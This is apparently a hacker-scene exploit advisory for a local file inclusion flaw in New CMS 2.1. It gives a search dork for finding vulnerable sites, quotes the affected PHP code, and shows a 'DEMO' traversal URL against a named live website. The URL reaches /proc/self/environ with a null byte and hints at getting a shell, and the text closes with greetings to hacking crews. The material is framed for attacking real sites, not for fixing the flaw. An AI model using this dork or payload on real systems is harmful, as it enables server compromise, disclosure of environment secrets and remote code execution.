=============================================== [+] TITLE : NEW CMS Local File Inclusion Vulnerability (/proc/self/environ) [+] VENDOR : http://new-cms.org/index.php?lng=it&mod=download&pg=indice [+] VERSION : 2.1 or Later [+] AUTHOR : R3vanBastard [+] TESTED ON : Windows [+] DORK : "New CMS" inurl:index.php?lng= [+] YM : revan_blezinsky[at]yahoo.com ==================[+]VULN[+]=================== if (get_magic_quotes_gpc()) { $process = array(&$_GET, &$_POST, &$_COOKIE, &$_REQUEST); while (list($key, $val) = each($process)) { foreach ($val as $k => $v) { unset($process[$key][$k]); if (is_array($v)) { $process[$key][stripslashes($k)] = $v; $process[] = &$process[$key][stripslashes($k)]; } else { $process[$key][stripslashes($k)] = stripslashes($v); } } } unset($process); } define("PER", ""); include(PER."cdat.php"); include(PER."struttura/funzioni.str"); //inclusione file con le funzioni e costanti principali include(CGEN."config".DTB); // inclusione file di configurazione if(strlen(dirname($_SERVER["SCRIPT_NAME"]))>1) { $DirName = dirname($_SERVER["SCRIPT_NAME"])."/"; } else { $DirName = "/"; } $sito[2] = "http://".$_SERVER["SERVER_NAME"].$DirName; $CMSVersion = "New-CMS 2.1"; if(isset($_GET['mod'])) $_GET['mod'] = Prot($_GET['mod']); if(isset($_GET['pg'])) $_GET['pg'] = Prot($_GET['pg']); if(isset($_GET['s'])) $_GET['s'] = Prot($_GET['s']); if(isset($_GET['lng'])) { if(strlen($_GET['lng'])>2) unset($_GET['lng']); } ============================================================ [DEMO] http://www.salvatorecotena.it/index.php?lng=../../../../../../../../../../../../../proc/self/environ%0000 [shell? ] =================================================================== Thanks to: My PC | Jogjamakeup.com | Mainhack |VOP CREW| Jack | rdnc.or.id | BoBy a.k.a c0li(yg botnya di gangbang) ===================================================================